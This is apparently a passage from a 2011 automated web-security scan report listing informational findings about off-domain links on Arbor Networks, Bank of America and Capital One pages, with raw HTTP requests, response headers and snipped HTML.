Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?lang=en HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e393324131872a0a340d3674de17ba3d; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
</a><a href="https://arbor.custhelp.com/app/home" class="mainlevel">Customer Support Login</a>
...[SNIP]...
<div style="width:260px;">01.28.2011 | <a class="contentheading" target="_blank" href="http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html?KEYWORDS=arbor+networks#printMode">Egypt Shuts Down Internet, Cellphone Services</a>
...[SNIP]...
<div style="width:260px;">01.28.2011 | <a class="contentheading" target="_blank" href="http://www.nytimes.com/2011/01/29/technology/internet/29cutoff.html?_r=1&ref=technology">Egypt Cuts Off Most Internet and Cell Service</a>
...[SNIP]...
<div style="width:260px;">01.28.2011 | <a class="contentheading" target="_blank" href="http://www.cnn.com/2011/TECH/web/01/28/egypt.internet.shutdown/index.html">Reports say Egypt Web shutdown is coordinated, extensive</a>
...[SNIP]...
<!-- 0 -->

6 Omni Way, Chelmsford, MA 01824 | T: 978.703.6600 | 866.212.7267
<script src="http://i.simpli.fi/dpx.js?cid=69&amp;action=100&amp;segment=AMP&amp;campaign_id=0">
<noscript>
...[SNIP]...

16.49. https://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.php?lang=en HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e585cbcac8f7bba066a55f149566ddd5=d5e8779f79f279837c08ef6bfe615159; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:02:19 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:02:19 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 00:02:20 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 00:02:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
</a><a href="https://arbor.custhelp.com/app/home" class="mainlevel">Customer Support Login</a>
...[SNIP]...

16.50. http://www.bankofamerica.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.cfm?page=corp HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:18 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=131847850; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=18f90e%2D000aada8%2Dd4a6%2D1d49%2D98e7%2D83689ffb0000; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=430356139.20480.0000; path=/


                                                                                               <tr valign="top">

   
       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http
...[SNIP]...
<li><a href="http://gmi.ml.com/factormodel/index.asp">BofAML Factor Model</a>
...[SNIP]...
<li><a href="http://gmi.ml.com/broadcort/index.asp">Broadcort</a>
...[SNIP]...
<li><a href="https://merrillmarketintelligence.ml.com/">Corporate Access</a>
...[SNIP]...
<li><a href="http://www.bancofamericaspecialist.com/">NYSE Specialist Firm</a>
...[SNIP]...
<li><a href="http://ba.ml.com/prime">Prime Brokerage</a>
...[SNIP]...
<li><a href="http://ml.com/index.asp?id=7695_8137">Research</a>
...[SNIP]...
<li><a href="http://www.benefitplans.baml.com/"><span class="auraltext">
...[SNIP]...
<br />


<script language="JavaScript" src="http://www.ethnio.com/app/screener/jss.php?scid=796_1708" type="text/javascript"></script>
...[SNIP]...

16.51. http://www.bankofamerica.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.cfm?page=about HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:18 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=136609973; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=46c05f6%2D000cbed8%2Dd4a6%2D1d49%2Db4c7%2D83ded6974552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=3165042347.20480.0000; path=/


                                                                                                           <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<meta http-equiv="content-type"
...[SNIP]...
</a> | <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=71595&p=irol-irhome" title="Bank of America Stock">Bank of America Stock</a>
...[SNIP]...
<td><a href="http://twitter.com/BofA_Careers
" name="right_nav_career">
<img src="/images/promo/Twitter-Ad-for-Careers_03
.gif" width="187" height="105" title="Stay connected to Careers on twitter @ BofA_Careers" alt="Stay connected to Careers on twitter @ BofA_Careers" b
...[SNIP]...

16.52. https://www.bankofamerica.com/credit-cards/cardoverview.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /credit-cards/cardoverview.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /credit-cards/cardoverview.action?context_id=overview_page HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:05 GMT
Content-type: text/html;charset=UTF-8
Set-Cookie: SMIDENTITY=uFfMEsd7D1Lzo3uqimBfPe6op0seYSw5FK0N2o2LSxuimtvA9qSCsJAvfeVsPvfCWm1zCN/uHtX/g6LYcixKdLOKiLVP/EYf8dA14vp/dukuVOIrGFEbLkEFNF+0TLF6cYbOrrRBQH2t4Kmg5r2AnGUxzO0ki0iL6zng6vOMz0BtJl+0iIVjW620dEs/h7MMW250NuhjvXThzgHOs+7T+SR6snV4cG0n/HE3DGvEfAwpMEGUnaF/vwOwK++AtNI08tRrefbmgZ37udknlk3NSTCsYSZhG47QS4M+SvY3qEnTfGrI4HFjsHl9ML18LpD+zUiCFRiJSenoooUDbLRX3MCFk3oHhGZrZ6XKTlbF8rkVoQEHaYzK6d2qOMDfWuSblZnIR3ay5o9P/W+QMTpH1RzCg+lbcu6QIUk99uonbsLmVZEC4t+bwq63q+3AXzmBmczAGibqlDK1nuSfk6ohbJ7gDSYPWFXG17jhdExIdGZGQmjYZ8FseepQUkKfbSNi; path=/; domain=.bankofamerica.com; secure
Content-language: en-US
Set-cookie: JSESSIONID=0000B59GHdMjavO4FAl3W7puTJ1:12qb4k2ev; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="EN">
   <head>
       <link href="/www/en_US/stylesheet/cardsearch/creditcards_style.css" type="text/css"
   rel="styles
...[SNIP]...
<NOSCRIPT>
   <IFRAME SRC="https://fls.doubleclick.net/activityi;src=1359940;type=consu416;cat=cccre876;ord=1;num=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<td class="cardsFinderBorder" align="left" width="100">
                                               <a name="card_ImageLink_0" id="card_Image_id_0" class="cardPadding"
                                               href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVK"
                                               title="BankAmericard Cash Rewards Visa Signature Card"
                                               target="_self"
                                               >
<img style="border: 0px; margin:0px;"
                                               height="63"
                                               width="100"                                    
                                               src="https://images.bankofamerica.com/cpcms/ECOMM/group/8AZC/ECOMM0908AZC00406800152720EN000
...[SNIP]...
<td class="cardsFinderBorder">                
                                               
                                               
                                                                                                                                                                           <a name="cardsFinder_0" id="cardsFinder_id_0" class="productTitle" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVK"
                                                target="_self"
                                                title="BankAmericard Cash Rewards Visa Signature Card">

                                               BankAmericard Cash Rewards&trade; Visa Signature<sup style="vertical-align: text-top; font-size: 77%">
...[SNIP]...
<div class="clear">    
                                                       
                                                       
                                                                                                                                                                                                                                                                                                                                                                                                               <a name="applyNow_0" id="applyNow_id_0"
                                                           title="Apply Now"
                                                           href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVK"
                                                           target="_self"
                                                           class="button" onclick="this.blur();">
<span>
...[SNIP]...
<td class="cardsFinderBorder" align="left" width="100">
                                               <a name="card_ImageLink_1" id="card_Image_id_1" class="cardPadding"
                                               href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVM"
                                               title="BankAmericard Visa Card"
                                               target="_self"
                                               >
<img style="border: 0px; margin:0px;"
                                               height="63"
                                               width="100"                                    
                                               src="https://images.bankofamerica.com/cpcms/ECOMM/group/8AZE/ECOMM0908AZE00400800153260EN000
...[SNIP]...
<td class="cardsFinderBorder">                
                                               
                                               
                                                                                                                                                                           <a name="cardsFinder_1" id="cardsFinder_id_1" class="productTitle" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVM"
                                                target="_self"
                                                title="BankAmericard Visa Card">

                                               BankAmericard<sup style="vertical-align: text-top; font-size: 77%">
...[SNIP]...
<div class="clear">    
                                                       
                                                       
                                                                                                                                                                                                                                                                                                                                                                                                               <a name="applyNow_1" id="applyNow_id_1"
                                                           title="Apply Now"
                                                           href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVM"
                                                           target="_self"
                                                           class="button" onclick="this.blur();">
<span>
...[SNIP]...
<td class="cardsFinderBorder" align="left" width="100">
                                               <a name="card_ImageLink_2" id="card_Image_id_2" class="cardPadding"
                                               href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVL"
                                               title="BankAmericard&reg; Power Rewards&reg; Visa Signature&reg; Card"
                                               target="_self"
                                               >
<img style="border: 0px; margin:0px;"
                                               height="63"
                                               width="100"                                    
                                               src="https://images.bankofamerica.com/cpcms/ECOMM/group/8AYB/ECOMM0908AYB00406800151520EN000
...[SNIP]...
<td class="cardsFinderBorder">                
                                               
                                               
                                                                                                                                                                           <a name="cardsFinder_2" id="cardsFinder_id_2" class="productTitle" href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVL"
                                                target="_self"
                                                title="BankAmericard&reg; Power Rewards&reg; Visa Signature&reg; Card">

                                               BankAmericard<sup style="vertical-align: text-top; font-size: 77%">
...[SNIP]...
<div class="clear">    
                                                       
                                                       
                                                                                                                                                                                                                                                                                                                                                                                                               <a name="applyNow_2" id="applyNow_id_2"
                                                           title="Apply Now"
                                                           href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABJVL"
                                                           target="_self"
                                                           class="button" onclick="this.blur();">
<span>
...[SNIP]...

16.53. https://www.bankofamerica.com/homepage/WidgetAction.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/WidgetAction.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /homepage/WidgetAction.go?requestType=display&divId=36094CED-7EDF-11DF-889C-00144F3EA4A4%2C360925D9-7EDF-11DF-889C-00144F3EA4A4%2C3608FEC5-7EDF-11DF-889C-00144F3EA4A4%2C36099B13-7EDF-11DF-889C-00144F3EA4A4&isWidget=true&targetedAdParams=%7B%7BmoduleId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CD3AAA0A1-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36094CED-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C18A00502-E390-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B360925D9-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7CB48EEC16-0060-11DF-B411-00144F25F968%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-service-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B3608FEC5-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D%3B%3BMODSEP%3B%3B%7B%7BmoduleId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BcontentId%3B%3BEQ%3B%3B%24%7BCONTENT%7C3619DDB0-E38E-11DF-B16B-00144F3EA4A4%7D%3B%3BATTRSEP%3B%3BmoduleType%3B%3BEQ%3B%3Bhp-media-module%3B%3BATTRSEP%3B%3BdivId%3B%3BEQ%3B%3B36099B13-7EDF-11DF-889C-00144F3EA4A4%3B%3BATTRSEP%3B%3BfoundTargetedAd%3B%3BEQ%3B%3Bfalse%7D%7D&previousPageId=3601F9E2-7EDF-11DF-889C-00144F3EA4A4&callback=jsonp1296684089276&_=1296684100174 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=21; cmTPSet=Y

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:44 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4735

jsonp1296684089276({widgetdata:[{htmlsrc:'                                                     <!-- sm1.2one -->                                                        <div class="links-list-module">    <div class="column-co
...[SNIP]...
</div>                <a href="https://www.applyonlinenow.com/USCCapp/Ctl/entry?sc=UABHER&cm_sp=Cons-CC-_-Card-Rewards-_-BHP-CHf-Hero_dep-101_mh2_cr_state_arn2h2d4_o.jpg" name="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Rewards&trade;. Get Started" target="_self" title="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Rewards&trade;. Get Started" >        <img src="/content/images/ContextualSiteGraphics/Marketing/Heroes/en_US/dep-101_mh2_cr_state_arn2h2d4_o.jpg" alt="Get a $50 statement credit after qualifying transaction(s). BankAmericard Cash Reward
...[SNIP]...

16.54. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /homepage/overview.go?js=y HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:04:39 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 47251


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="https://www.merrilledge.com/m/pages/home.aspx" target="_self" name="signin_online_investing" >Online Investing</a>
...[SNIP]...
</a>


                                                               <a name="investment_services_overview" href="https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1" target="_self">Merrill Edge Advisory Center</a>
...[SNIP]...
<NOSCRIPT>
       <IFRAME SRC="https://fls.doubleclick.net/activityi;src=1359940;type=front061;cat=2010b535;ord=1;num=?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...

16.55. http://www.capitalone.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /about/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /about/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_01_T_ABT HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=XHcTNJWY5ZzWm0m0FpTQhhJvpSxs2sNy2qGTTFTdKThTFQG36z51!551948806; path=/
Set-Cookie: Corporate=6d2bccf6cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCo8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS06NMzQwgKj3zENTDAA%3D; domain=.capitalone.com; expires=Saturday, 30-Jan-2021 22:12:40 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 55757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Explore the history and culture of one of America's
...[SNIP]...
<li><a href="https://towernet.capitalonebank.com/loginpage.html">TowerNET</a>
...[SNIP]...
<li><a href="https://top.capitalonebank.com/cashplus/">Treasury Optimizer</a>
...[SNIP]...

16.56. http://www.capitalone.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /careers/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /careers/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_03_T_C1 HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 35950

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>The l
...[SNIP]...
<td valign="top"><a href="http://diversityinc.com/article/7347/" target="_blank"" target="_blank"><img title="" height="84" alt="" src="/images/careers/2010-DivIncTop50-Logo.gif" width="61" align="left" border="0" />
...[SNIP]...
<br /><a href="http://diversityinc.com/article/7347/" target="_blank">See our listing here</a>
...[SNIP]...

16.57. http://www.capitalone.com/financialeducation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /financialeducation/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /financialeducation/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_06_T_FIN HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
